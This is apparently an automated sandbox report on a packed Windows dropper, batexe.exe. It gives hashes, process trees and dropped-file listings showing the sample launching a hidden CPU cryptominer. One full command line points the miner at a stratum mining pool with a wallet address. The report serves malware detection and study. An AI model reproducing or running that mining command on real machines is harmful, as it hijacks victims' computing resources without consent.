73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
296s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12-02-2024 05:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3912	b2e.exe
3748	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3748	cpuminer-sse2.exe
3748	cpuminer-sse2.exe
3748	cpuminer-sse2.exe
3748	cpuminer-sse2.exe
3748	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2172-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2172 wrote to memory of 3912	2172	batexe.exe	36
PID 2172 wrote to memory of 3912	2172	batexe.exe	36
PID 2172 wrote to memory of 3912	2172	batexe.exe	36
PID 3912 wrote to memory of 3888	3912	b2e.exe	49
PID 3912 wrote to memory of 3888	3912	b2e.exe	49
PID 3912 wrote to memory of 3888	3912	b2e.exe	49
PID 3888 wrote to memory of 3748	3888	cmd.exe	48
PID 3888 wrote to memory of 3748	3888	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2172
- C:\Users\Admin\AppData\Local\Temp\91E0.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\91E0.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\91E0.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9395.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3888

C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\91E0.tmp\b2e.exe

Filesize
64KB

MD5
3e63d8d147aec3c4d5e3e08d79395350

SHA1
633cc399218c2915b895a83bda89bce9f37e39dc

SHA256
39cc053a2dc8074a4530b02f00bd8bb723e52196224d978d9aad3b0f75740320

SHA512
545308057e5ea490e55f5bdd7fbec20fd954f847cae6f60460a4b135bf76c4c8502d922768d8e3a96d29d4c3a513b91ebc40bcaf5395de2c50d4368fd46fc536

Download Submit
C:\Users\Admin\AppData\Local\Temp\91E0.tmp\b2e.exe

Filesize
74KB

MD5
8e9d2909374847cd66f9d0da514ebecb

SHA1
f5b0d391e8f8391a7ad960e80e2214e3c0c40e85

SHA256
b3c566f00a11a0891a8cc7ffa4014d57e56d7b02b66045a6610fc7d7be4bb712

SHA512
e2a9cc17b22533a65de26e42a7e083b366fca7c22751b5704d9d24808b034d2bc0cd28cecc274b36800c8cd50cefdc5cb93cfeff1ff7984ba21d876358faae1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\9395.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
307KB

MD5
7079b43e53e11e9ce62c0a993b7584eb

SHA1
f8028c318f63eaa2edfea3759c213dce777a5c47

SHA256
45edcd28ed0f5e9c18e85208fe92a58243f15e44ae20e6b37989f0f4713f1b07

SHA512
0b568df9cb947e3392c90cf59f9eebac7ed4b879e6c7af19b52e2efbcb10f3ae28ab18922e2d2817a6f5e13f6a2e5d6731195612f60136e777e31baa21af9e27

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
643KB

MD5
b8b51db380a5769dd15353fa53b2f53d

SHA1
80f9a664bec21e12654cda631f1b2c6d4dc184c4

SHA256
2643a09b48799d369ce60937639450a61663e6fd2c351eac191c70e8e9d74a18

SHA512
3f8468422bdc65afcbe05a2577e14a69d9b44251dc3e49979709178605a548ccf5b569bcb42eef7145b04486165bc72fac34f40f080793840fa28747b572d3c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
605KB

MD5
958e992d0a3f37850d832dba33184cd6

SHA1
6af595dc40ad2122cc72a3efea04c96c397d9089

SHA256
f547de08ecd6e28db5d9767807a1340d5af7d76e78c8172dd1c9b91a0ba01d8e

SHA512
65565c6a5d08e8f5fbdbfec8b387cc2edd5e65f33c3a49efb969c4b7dc6627e28ade9556e20ff7df412194ee122a0daaf24e5ed6acb861694ef1198734aa31c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
443KB

MD5
89534d048ce88192bd5a4e60b2b9fd7f

SHA1
cc8b6c25782f17c907c3ef92a8d8b52873b608e4

SHA256
297ba0ecccb16773d141d4da692edec189541031d37dcabdf7aaaed7a9966ec1

SHA512
76413e78dbb1acc1d35f1bf412029dd898cbca4de111b26d79ebd16b7a377bbe947979167fbb3852b85c758e8f82275957a023a9f15c4a3584de7f368f9082d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
381KB

MD5
d13a714e7e46e4d36e14ab0e71fe9f8d

SHA1
2c0e5c50de96b9d5fdcd9e828a058e0125259e17

SHA256
94bb846a4684a03d028afe8981c8712a3d941e2eef27f8246a2356466c7a531f

SHA512
9acb1219e27395c3bf7106c2aae4bcdd72ca6c0654c36de31bdefc5623ae9840e98e4c4fc2fcb615190da099bb46283064cdf1c1c64835e4dd8115044857e4cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
517KB

MD5
0b7b9263c4e7fe6675f5df27e4959810

SHA1
ce9b4ea7c6a6049194a158283559f363ebeac7e9

SHA256
3b4e91420de8ac2a689281ac1b94401ac206dc492d4a7e37d7ba1293727b9b76

SHA512
9fd45e6226592b13c339b28dca74dd4f6e4afb1808fb4cc5c4e424ce6443e353bcf155950ae4ef03046f577cf6a8966943baa2d626c99349be43cff2a9dd4f03

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
508KB

MD5
37a8509e6fae4078f335bacab8a2a342

SHA1
a54f4e81e79a80afb0b39a4cb77ccd5ddf630d0b

SHA256
00a2f0334b67a1c2ac955540eda72434756c2325879071e5820ebd76c50bf711

SHA512
581fe899476f4a4cc234860c0081187e99af9db717d34e6aff59d781729491363c596abd0b1321dd98890bf7b698990be8ca39a5380a07b3c2ef2c72d1e27476

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
522KB

MD5
1d3c6f89a8455662a4a7d6829e83659b

SHA1
15670948c1c08b758de0f30941f5714ecd6c010c

SHA256
b55929729731afef5bca7843d83fe23333262ad425f25a7e3c23ee974537dd3c

SHA512
3b03b76909c849e334095a7640c96a9ce4de1b5f50a71d98cc09d89c44d6ab190a66caf71374afb5f1c0db01eedd6e63de70a4af9a49fa998ec0c9c19ce3f7ba

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
214KB

MD5
a6c28901d2be649c82c37db60281cec3

SHA1
9af803ad8fdb267d106a60f9bf2e340a1e552d44

SHA256
f3d692431c4a7a6fba4ef0245038ff22a0bfadf5423c65f52b8adf6e6e4a6ab4

SHA512
1308a5a1714ebf86c5fbe8921a600e8b94f62ae0736e52ec71957388f8ff3cbf734ee145cd8488047e0491f12107ea7c1e2e7b89ccaf1cc1a5099318a2388493

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
639KB

MD5
c90a59349da004ac741f9839f6f1f391

SHA1
450a053b8732baf1d04f5f9bf46c6d045997447f

SHA256
6ee8ba00df4c98f0e2f7b56057070d077e7edb046b314395de750b3fde6868b4

SHA512
22f0bdee03963f11ec85a94da7ae94876d501aedf93bb5107beb8eaccfce2cdc551eadcb530e90daa61d92631d4a9f019e37a05b327b03221331c11a94ad6e24

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
146KB

MD5
cd3394b99421e305cdb22c6da21d2b87

SHA1
f7c5311dab4bdf06cc0e703426fcf4d5e452e6ee

SHA256
7edd33a5631d896343e5556482eb6f5902e0dfa924a109cade020d76405f641b

SHA512
aff1ab9bf5f2fa37776bfb3e588816aaa5ddc07f7c382a1cbef2cc76a0af9a618c52f02259fdcd9fc0981d3bddb082f4de2c53984b072c704a6a77095679e063

Download Submit
memory/2172-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3748-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3748-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-43-0x000000005A600000-0x000000005A698000-memory.dmp

Filesize
608KB

Download
memory/3748-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3748-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-44-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/3748-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3748-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3912-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3912-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download